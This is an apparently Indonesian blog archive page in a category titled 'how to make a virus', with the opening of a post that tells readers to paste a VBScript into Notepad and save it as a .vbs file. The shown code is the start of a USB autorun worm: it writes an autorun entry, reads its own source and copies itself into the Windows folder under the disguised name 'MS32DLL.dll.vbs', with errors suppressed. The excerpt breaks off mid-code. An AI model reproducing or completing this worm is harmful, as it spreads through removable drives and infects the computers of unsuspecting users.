Arsip untuk ‘CAra bikin Virus’ Kategori

Virus yang bikin gelap

copy paste script di bawah ini, pastenya di notepad dan simpan dengan type .vbs on error resume nextdim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sdatr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe MS32DLL.dll.vbs”set fs = createobject(“Scripting.FileSystemObject”)set mf = fs.getfile(Wscript.ScriptFullname)dim text,sizesize = mf.sizecheck = mf.drive.drivetypeset text=mf.openastextstream(1,-2)do while not text.atendofstreammysource=mysource&text.readlinemysource=mysource & vbcrlfloopdoSet winpath = fs.getspecialfolder(0)set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)tf.attributes = 32set tf=fs.createtextfile(winpath & “\MS32DLL.dll.vbs”,2,true)tf.write mysourcetf.closeset tf = [...]

Continue reading »

Ikuti

Get every new post delivered to your Inbox.